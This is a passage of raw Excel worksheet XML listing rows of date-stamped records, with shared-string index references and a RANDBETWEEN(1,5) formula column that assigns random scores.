        <v>43213.60361111111</v>
      </c>
      <c r="C15790" t="s">
        <v>41</v>
      </c>
      <c r="E15790" t="s">
        <v>14209</v>
      </c>
      <c r="F15790">
        <f t="shared" ca="1" si="246"/>
        <v>1</v>
      </c>
    </row>
    <row r="15791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15791" s="1">
        <v>43213.602372685185</v>
      </c>
      <c r="C15791" t="s">
        <v>10</v>
      </c>
      <c r="D15791" t="s">
        <v>158</v>
      </c>
      <c r="E15791" t="s">
        <v>14210</v>
      </c>
      <c r="F15791">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15792" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15792" s="1">
        <v>43213.576990740738</v>
      </c>
      <c r="C15792" t="s">
        <v>1931</v>
      </c>
      <c r="D15792" t="s">
        <v>114</v>
      </c>
      <c r="E15792" s="2" t="s">
        <v>14211</v>
      </c>
      <c r="F15792">
        <f t="shared" ca="1" si="246"/>
        <v>4</v>
      </c>
    </row>
    <row r="15793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15793" s="1">
        <v>43213.560196759259</v>
      </c>
      <c r="C15793" t="s">
        <v>10</v>
      </c>
      <c r="D15793" t="s">
        <v>80</v>
      </c>
      <c r="E15793" t="s">
        <v>14212</v>
      </c>
      <c r="F15793">
        <f t="shared" ca="1" si="246"/>
        <v>1</v>
      </c>
    </row>
    <row r="15794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15794" s="1">
        <v>43213.538738425923</v>
      </c>
      <c r="C15794" t="s">
        <v>6</v>
      </c>
      <c r="D15794" t="s">
        <v>194</v>
      </c>
      <c r="E15794" t="s">
        <v>14213</v>
      </c>
      <c r="F15794">
        <f t="shared" ca="1" si="246"/>
        <v>3</v>
      </c>
    </row>
    <row r="15795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15795" s="1">
        <v>43213.529270833336</v>
      </c>
      <c r="C15795" t="s">
        <v>10</v>
      </c>
      <c r="D15795" t="s">
        <v>290</v>
      </c>
      <c r="E15795" t="s">
        <v>14214</v>
      </c>
      <c r="F15795">
        <f t="shared" ca="1" si="246"/>
        <v>2</v>
      </c>
    </row>
    <row r="15796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15796" s="1">
        <v>43213.511331018519</v>
      </c>
      <c r="C15796" t="s">
        <v>10</v>
      </c>
      <c r="D15796" t="s">
        <v>20</v>
      </c>
      <c r="E15796" t="s">
        <v>14215</v>
      </c>
      <c r="F15796">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15797" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A15797" s="1">
        <v>43213.495011574072</v>
      </c>
      <c r="C15797" t="s">
        <v>10</v>
      </c>
      <c r="D15797" t="s">
        <v>271</v>
      </c>
      <c r="E15797" s="2" t="s">
        <v>14216</v>
      </c>
      <c r="F15797">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15798" s="1">
        <v>43213.490810185183</v>
      </c>
      <c r="C15798" t="s">
        <v>10</v>
      </c>
      <c r="D15798" t="s">
        <v>89</v>
      </c>
      <c r="E15798" t="s">
        <v>14217</v>
      </c>
      <c r="F15798">
        <f t="shared" ca="1" si="246"/>
        <v>2</v>
      </c>
    </row>
    <row r="15799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15799" s="1">
        <v>43213.48978009259</v>
      </c>
      <c r="C15799" t="s">
        <v>10</v>
      </c>
      <c r="D15799" t="s">
        <v>92</v>
      </c>
      <c r="E15799" t="s">
        <v>14218</v>
      </c>
      <c r="F15799">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15800" s="1">
        <v>43213.489398148151</v>
      </c>
      <c r="C15800" t="s">
        <v>430</v>
      </c>
      <c r="E15800" t="s">
        <v>14219</v>
      </c>
      <c r="F15800">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15801" s="1">
        <v>43213.483240740738</v>
      </c>
      <c r="C15801" t="s">
        <v>10</v>
      </c>
      <c r="D15801" t="s">
        <v>163</v>
      </c>
      <c r="E15801" t="s">
        <v>14220</v>
      </c>
      <c r="F15801">
        <f t="shared" ca="1" si="246"/>
        <v>2</v>
      </c>
    </row>
    <row r="15802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15802" s="1">
        <v>43213.463784722226</v>
      </c>
      <c r="C15802" t="s">
        <v>253</v>
      </c>
      <c r="D15802" t="s">
        <v>244</v>
      </c>
      <c r="E15802" t="s">
        <v>14221</v>
      </c>
      <c r="F15802">
        <f t="shared" ca="1" si="246"/>
        <v>2</v>
      </c>
    </row>
    <row r="15803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15803" s="1">
        <v>43213.462766203702</v>
      </c>
      <c r="C15803" t="s">
        <v>10</v>
      </c>
      <c r="D15803" t="s">
        <v>39</v>
      </c>
      <c r="E15803" t="s">
        <v>14222</v>
      </c>
      <c r="F15803">
        <f t="shared" ca="1" si="246"/>
        <v>1</v>
      </c>
    </row>
    <row r="15804" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15804" s="1">
        <v>43213.436296296299</v>
      </c>
      <c r="C15804" t="s">
        <v>16</v>
      </c>
      <c r="D15804" t="s">
        <v>713</v>
      </c>
      <c r="E15804" s="2" t="s">
        <v>14223</v>
      </c>
      <c r="F15804">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15805" s="1">
        <v>43213.433321759258</v>
      </c>
      <c r="C15805" t="s">
        <v>10</v>
      </c>
      <c r="D15805" t="s">
        <v>89</v>
      </c>
      <c r="E15805" t="s">
        <v>14224</v>
      </c>
      <c r="F15805">
        <f t="shared" ca="1" si="246"/>
        <v>4</v>
      </c>
    </row>
    <row r="15806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15806" s="1">
        <v>43213.427870370368</v>
      </c>
      <c r="C15806" t="s">
        <v>41</v>
      </c>
      <c r="E15806" t="s">
        <v>14225</v>
      </c>
      <c r="F15806">
        <f t="shared" ca="1" si="246"/>
        <v>4</v>
      </c>
    </row>
    <row r="15807" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15807" s="1">
        <v>43213.419432870367</v>
      </c>
      <c r="C15807" t="s">
        <v>16</v>
      </c>
      <c r="E15807" s="2" t="s">
        <v>14226</v>
      </c>
      <c r="F15807">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15808" s="1">
        <v>43213.401354166665</v>
      </c>
      <c r="C15808" t="s">
        <v>173</v>
      </c>
      <c r="E15808" t="s">
        <v>14227</v>
      </c>
      <c r="F15808">
        <f t="shared" ca="1" si="246"/>
        <v>2</v>
      </c>
    </row>
    <row r="15809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15809" s="1">
        <v>43213.394976851851</v>
      </c>
      <c r="C15809" t="s">
        <v>260</v>
      </c>
      <c r="E15809" t="s">
        <v>14228</v>
      </c>
      <c r="F15809">
        <f t="shared" ca="1" si="246"/>
        <v>5</v>
      </c>
    </row>
    <row r="15810" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15810" s="1">
        <v>43213.375277777777</v>
      </c>
      <c r="C15810" t="s">
        <v>1377</v>
      </c>
      <c r="D15810" t="s">
        <v>89</v>
      </c>
      <c r="E15810" s="2" t="s">
        <v>14229</v>
      </c>
      <c r="F15810">
        <f t="shared" ref="F15810:F15873" ca="1" si="247">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="15811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15811" s="1">
        <v>43213.369560185187</v>
      </c>
      <c r="C15811" t="s">
        <v>48</v>
      </c>
      <c r="E15811" t="s">
        <v>14230</v>
      </c>
      <c r="F15811">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15812" s="1">
        <v>43213.363958333335</v>
      </c>
      <c r="C15812" t="s">
        <v>6</v>
      </c>
      <c r="D15812" t="s">
        <v>2139</v>
      </c>
      <c r="F15812">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15813" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A15813" s="1">
        <v>43213.35665509259</v>
      </c>
      <c r="C15813" t="s">
        <v>479</v>
      </c>
      <c r="D15813" t="s">
        <v>367</v>
      </c>
      <c r="E15813" s="2" t="s">
        <v>14231</v>
      </c>
      <c r="F15813">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15814" s="1">
        <v>43213.334756944445</v>
      </c>
      <c r="C15814" t="s">
        <v>124</v>
      </c>
      <c r="D15814" t="s">
        <v>312</v>
      </c>
      <c r="E15814" t="s">
        <v>14232</v>
      </c>
      <c r="F15814">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15815" s="1">
        <v>43213.329247685186</v>
      </c>
      <c r="C15815" t="s">
        <v>10</v>
      </c>
      <c r="D15815" t="s">
        <v>36</v>
      </c>
      <c r="E15815" t="s">
        <v>14233</v>
      </c>
      <c r="F15815">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15816" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A15816" s="1">
        <v>43213.327916666669</v>
      </c>
      <c r="C15816" t="s">
        <v>10</v>
      </c>
      <c r="D15816" t="s">
        <v>46</v>
      </c>
      <c r="E15816" s="2" t="s">
        <v>14234</v>
      </c>
      <c r="F15816">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15817" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15817" s="1">
        <v>43213.296377314815</v>
      </c>
      <c r="C15817" t="s">
        <v>1931</v>
      </c>
      <c r="D15817" t="s">
        <v>94</v>
      </c>
      <c r="E15817" s="2" t="s">
        <v>14235</v>
      </c>
      <c r="F15817">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15818" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15818" s="1">
        <v>43213.293553240743</v>
      </c>
      <c r="C15818" t="s">
        <v>65</v>
      </c>
      <c r="D15818" t="s">
        <v>263</v>
      </c>
      <c r="E15818" s="2" t="s">
        <v>14236</v>
      </c>
      <c r="F15818">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15819" s="1">
        <v>43213.277986111112</v>
      </c>
      <c r="C15819" t="s">
        <v>173</v>
      </c>
      <c r="E15819" t="s">
        <v>14237</v>
      </c>
      <c r="F15819">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15820" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A15820" s="1">
        <v>43213.241377314815</v>
      </c>
      <c r="C15820" t="s">
        <v>17</v>
      </c>
      <c r="E15820" s="2" t="s">
        <v>14238</v>
      </c>
      <c r="F15820">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15821" s="1">
        <v>43213.205648148149</v>
      </c>
      <c r="C15821" t="s">
        <v>41</v>
      </c>
      <c r="E15821" t="s">
        <v>14239</v>
      </c>
      <c r="F15821">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15822" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A15822" s="1">
        <v>43213.191388888888</v>
      </c>
      <c r="C15822" t="s">
        <v>48</v>
      </c>
      <c r="D15822" t="s">
        <v>330</v>
      </c>
      <c r="E15822" s="2" t="s">
        <v>14240</v>
      </c>
      <c r="F15822">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15823" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A15823" s="1">
        <v>43213.174328703702</v>
      </c>
      <c r="C15823" t="s">
        <v>65</v>
      </c>
      <c r="E15823" s="2" t="s">
        <v>14241</v>
      </c>
      <c r="F15823">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15824" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15824" s="1">
        <v>43213.164502314816</v>
      </c>
      <c r="C15824" t="s">
        <v>197</v>
      </c>
      <c r="E15824" s="2" t="s">
        <v>14242</v>
      </c>
      <c r="F15824">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15825" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15825" s="1">
        <v>43213.131030092591</v>
      </c>
      <c r="C15825" t="s">
        <v>454</v>
      </c>
      <c r="E15825" s="2" t="s">
        <v>14243</v>
      </c>
      <c r="F15825">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15826" s="1">
        <v>43213.090983796297</v>
      </c>
      <c r="C15826" t="s">
        <v>318</v>
      </c>
      <c r="E15826" t="s">
        <v>14244</v>
      </c>
      <c r="F15826">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15827" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15827" s="1">
        <v>43213.085266203707</v>
      </c>
      <c r="C15827" t="s">
        <v>41</v>
      </c>
      <c r="E15827" s="2" t="s">
        <v>14245</v>
      </c>
      <c r="F15827">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15828" s="1">
        <v>43213.058541666665</v>
      </c>
      <c r="C15828" t="s">
        <v>41</v>
      </c>
      <c r="E15828" t="s">
        <v>14246</v>
      </c>
      <c r="F15828">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15829" s="1">
        <v>43213.052546296298</v>
      </c>
      <c r="C15829" t="s">
        <v>43</v>
      </c>
      <c r="E15829" t="s">
        <v>14247</v>
      </c>
      <c r="F15829">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15830" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15830" s="1">
        <v>43213.034895833334</v>
      </c>
      <c r="C15830" t="s">
        <v>328</v>
      </c>
      <c r="D15830" t="s">
        <v>56</v>
      </c>
      <c r="E15830" s="2" t="s">
        <v>14248</v>
      </c>
      <c r="F15830">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15831" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A15831" s="1">
        <v>43213.02412037037</v>
      </c>
      <c r="C15831" t="s">
        <v>1812</v>
      </c>
      <c r="D15831" t="s">
        <v>602</v>
      </c>
      <c r="E15831" s="2" t="s">
        <v>14249</v>
      </c>
      <c r="F15831">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15832" s="1">
        <v>43213.001701388886</v>
      </c>
      <c r="C15832" t="s">
        <v>408</v>
      </c>
      <c r="E15832" t="s">
        <v>14250</v>
      </c>
      <c r="F15832">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15833" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A15833" s="1">
        <v>43212.985879629632</v>
      </c>
      <c r="C15833" t="s">
        <v>314</v>
      </c>
      <c r="E15833" s="2" t="s">
        <v>14251</v>
      </c>
      <c r="F15833">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15834" s="1">
        <v>43212.978807870371</v>
      </c>
      <c r="C15834" t="s">
        <v>140</v>
      </c>
      <c r="D15834" t="s">
        <v>141</v>
      </c>
      <c r="E15834" t="s">
        <v>14252</v>
      </c>
      <c r="F15834">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15835" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15835" s="1">
        <v>43212.905335648145</v>
      </c>
      <c r="C15835" t="s">
        <v>408</v>
      </c>
      <c r="E15835" s="2" t="s">
        <v>14253</v>
      </c>
      <c r="F15835">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15836" s="1">
        <v>43212.83320601852</v>
      </c>
      <c r="C15836" t="s">
        <v>82</v>
      </c>
      <c r="D15836" t="s">
        <v>194</v>
      </c>
      <c r="E15836" t="s">
        <v>14254</v>
      </c>
      <c r="F15836">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15837" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15837" s="1">
        <v>43212.711504629631</v>
      </c>
      <c r="C15837" t="s">
        <v>1931</v>
      </c>
      <c r="D15837" t="s">
        <v>89</v>
      </c>
      <c r="E15837" s="2" t="s">
        <v>14255</v>
      </c>
      <c r="F15837">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15838" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A15838" s="1">
        <v>43212.700127314813</v>
      </c>
      <c r="C15838" t="s">
        <v>471</v>
      </c>
      <c r="D15838" t="s">
        <v>89</v>
      </c>
      <c r="E15838" s="2" t="s">
        <v>14256</v>
      </c>
      <c r="F15838">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15839" s="1">
        <v>43212.696944444448</v>
      </c>
      <c r="C15839" t="s">
        <v>10</v>
      </c>
      <c r="D15839" t="s">
        <v>158</v>
      </c>
      <c r="E15839" t="s">
        <v>14257</v>
      </c>
      <c r="F15839">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15840" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15840" s="1">
        <v>43212.559386574074</v>
      </c>
      <c r="C15840" t="s">
        <v>82</v>
      </c>
      <c r="D15840" t="s">
        <v>494</v>
      </c>
      <c r="E15840" s="2" t="s">
        <v>14258</v>
      </c>
      <c r="F15840">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15841" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15841" s="1">
        <v>43212.477118055554</v>
      </c>
      <c r="C15841" t="s">
        <v>73</v>
      </c>
      <c r="D15841" t="s">
        <v>25</v>
      </c>
      <c r="E15841" s="2" t="s">
        <v>14259</v>
      </c>
      <c r="F15841">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15842" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15842" s="1">
        <v>43212.430104166669</v>
      </c>
      <c r="C15842" t="s">
        <v>82</v>
      </c>
      <c r="D15842" t="s">
        <v>94</v>
      </c>
      <c r="E15842" s="2" t="s">
        <v>14260</v>
      </c>
      <c r="F15842">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15843" s="1">
        <v>43212.427534722221</v>
      </c>
      <c r="C15843" t="s">
        <v>5162</v>
      </c>
      <c r="E15843" t="s">
        <v>14261</v>
      </c>
      <c r="F15843">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15844" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15844" s="1">
        <v>43212.385289351849</v>
      </c>
      <c r="C15844" t="s">
        <v>6230</v>
      </c>
      <c r="D15844" t="s">
        <v>163</v>
      </c>
      <c r="E15844" s="2" t="s">
        <v>14262</v>
      </c>
      <c r="F15844">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15845" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15845" s="1">
        <v>43212.382430555554</v>
      </c>
      <c r="C15845" t="s">
        <v>41</v>
      </c>
      <c r="E15845" t="s">
        <v>14263</v>
      </c>
      <c r="F15845">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15846" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15846" s="1">
        <v>43212.378148148149</v>
      </c>
      <c r="C15846" t="s">
        <v>82</v>
      </c>
      <c r="D15846" t="s">
        <v>1993</v>
      </c>
      <c r="E15846" s="2" t="s">
        <v>14264</v>
      </c>
      <c r="F15846">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15847" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15847" s="1">
        <v>43212.302708333336</v>
      </c>
      <c r="C15847" t="s">
        <v>3049</v>
      </c>
      <c r="D15847" t="s">
        <v>92</v>
      </c>
      <c r="E15847" s="2" t="s">
        <v>14265</v>
      </c>
      <c r="F15847">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15848" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15848" s="1">
        <v>43212.206759259258</v>
      </c>
      <c r="C15848" t="s">
        <v>82</v>
      </c>
      <c r="D15848" t="s">
        <v>89</v>
      </c>
      <c r="E15848" s="2" t="s">
        <v>14266</v>
      </c>
      <c r="F15848">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15849" s="1">
        <v>43212.153252314813</v>
      </c>
      <c r="C15849" t="s">
        <v>318</v>
      </c>
      <c r="E15849" t="s">
        <v>14267</v>
      </c>
      <c r="F15849">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15850" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15850" s="1">
        <v>43212.140150462961</v>
      </c>
      <c r="C15850" t="s">
        <v>29</v>
      </c>
      <c r="D15850" t="s">
        <v>192</v>
      </c>
      <c r="E15850" s="2" t="s">
        <v>14268</v>
      </c>
      <c r="F15850">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15851" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A15851" s="1">
        <v>43212.126944444448</v>
      </c>
      <c r="C15851" t="s">
        <v>408</v>
      </c>
      <c r="E15851" s="2" t="s">
        <v>14269</v>
      </c>
      <c r="F15851">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15852" s="1">
        <v>43212.064745370371</v>
      </c>
      <c r="C15852" t="s">
        <v>1064</v>
      </c>
      <c r="D15852" t="s">
        <v>56</v>
      </c>
      <c r="E15852" t="s">
        <v>14270</v>
      </c>
      <c r="F15852">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15853" s="1">
        <v>43212.046724537038</v>
      </c>
      <c r="C15853" t="s">
        <v>41</v>
      </c>
      <c r="F15853">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15854" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15854" s="1">
        <v>43211.967106481483</v>
      </c>
      <c r="C15854" t="s">
        <v>454</v>
      </c>
      <c r="D15854" t="s">
        <v>721</v>
      </c>
      <c r="E15854" s="2" t="s">
        <v>14271</v>
      </c>
      <c r="F15854">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15855" s="1">
        <v>43211.928101851852</v>
      </c>
      <c r="C15855" t="s">
        <v>6</v>
      </c>
      <c r="D15855" t="s">
        <v>124</v>
      </c>
      <c r="E15855" t="s">
        <v>14272</v>
      </c>
      <c r="F15855">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15856" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15856" s="1">
        <v>43211.761481481481</v>
      </c>
      <c r="C15856" t="s">
        <v>73</v>
      </c>
      <c r="D15856" t="s">
        <v>151</v>
      </c>
      <c r="E15856" s="2" t="s">
        <v>14273</v>
      </c>
      <c r="F15856">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15857" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15857" s="1">
        <v>43211.645995370367</v>
      </c>
      <c r="C15857" t="s">
        <v>29</v>
      </c>
      <c r="D15857" t="s">
        <v>367</v>
      </c>
      <c r="E15857" s="2" t="s">
        <v>14274</v>
      </c>
      <c r="F15857">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15858" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15858" s="1">
        <v>43211.625439814816</v>
      </c>
      <c r="C15858" t="s">
        <v>82</v>
      </c>
      <c r="D15858" t="s">
        <v>107</v>
      </c>
      <c r="E15858" s="2" t="s">
        <v>14275</v>
      </c>
      <c r="F15858">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15859" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15859" s="1">
        <v>43211.623217592591</v>
      </c>
      <c r="C15859" t="s">
        <v>73</v>
      </c>
      <c r="D15859" t="s">
        <v>124</v>
      </c>
      <c r="E15859" s="2" t="s">
        <v>14276</v>
      </c>
      <c r="F15859">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15860" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A15860" s="1">
        <v>43211.610358796293</v>
      </c>
      <c r="C15860" t="s">
        <v>124</v>
      </c>
      <c r="D15860" t="s">
        <v>312</v>
      </c>
      <c r="E15860" s="2" t="s">
        <v>14277</v>
      </c>
      <c r="F15860">
        <f t="shared" ca="1" si="247"/>
        <v>3</v>
      </c>
    </row>
    <row r="15861" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15861" s="1">
        <v>43211.591377314813</v>
      </c>
      <c r="C15861" t="s">
        <v>82</v>
      </c>
      <c r="D15861" t="s">
        <v>713</v>
      </c>
      <c r="E15861" s="2" t="s">
        <v>14278</v>
      </c>
      <c r="F15861">
        <f t="shared" ca="1" si="247"/>
        <v>5</v>
      </c>
    </row>
    <row r="15862" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15862" s="1">
        <v>43211.391863425924</v>
      </c>
      <c r="C15862" t="s">
        <v>139</v>
      </c>
      <c r="D15862" t="s">
        <v>178</v>
      </c>
      <c r="E15862" s="2" t="s">
        <v>14279</v>
      </c>
      <c r="F15862">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15863" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15863" s="1">
        <v>43211.382314814815</v>
      </c>
      <c r="C15863" t="s">
        <v>29</v>
      </c>
      <c r="D15863" t="s">
        <v>1091</v>
      </c>
      <c r="E15863" s="2" t="s">
        <v>14280</v>
      </c>
      <c r="F15863">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15864" s="1">
        <v>43211.381782407407</v>
      </c>
      <c r="C15864" t="s">
        <v>10</v>
      </c>
      <c r="D15864" t="s">
        <v>56</v>
      </c>
      <c r="E15864" t="s">
        <v>14281</v>
      </c>
      <c r="F15864">
        <f t="shared" ca="1" si="247"/>
        <v>1</v>
      </c>
    </row>
    <row r="15865" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15865" s="1">
        <v>43211.337245370371</v>
      </c>
      <c r="C15865" t="s">
        <v>139</v>
      </c>
      <c r="D15865" t="s">
        <v>158</v>
      </c>
      <c r="E15865" s="2" t="s">
        <v>14282</v>
      </c>
      <c r="F15865">
        <f t="shared" ca="1" si="247"/>
        <v>2</v>
      </c>
    </row>
    <row r="15866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15866" s="1">
        <v>43211.235543981478</v>
      </c>
      <c r="C15866" t="s">
        <v>41</v>
      </c>
      <c r="E15866" t="s">
        <v>14283</v>
      </c>
      <c r="F15866">
        <f t="shared" ca="1" si="247"/>
        <v>4</v>
      </c>
    </row>
    <row r="15867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15867" s="1">
        <v>43211.155821759261</v>
      </c>
      <c r="C15867" t="s">
        <v>41</v>
      </c>
      <c r="F15867">
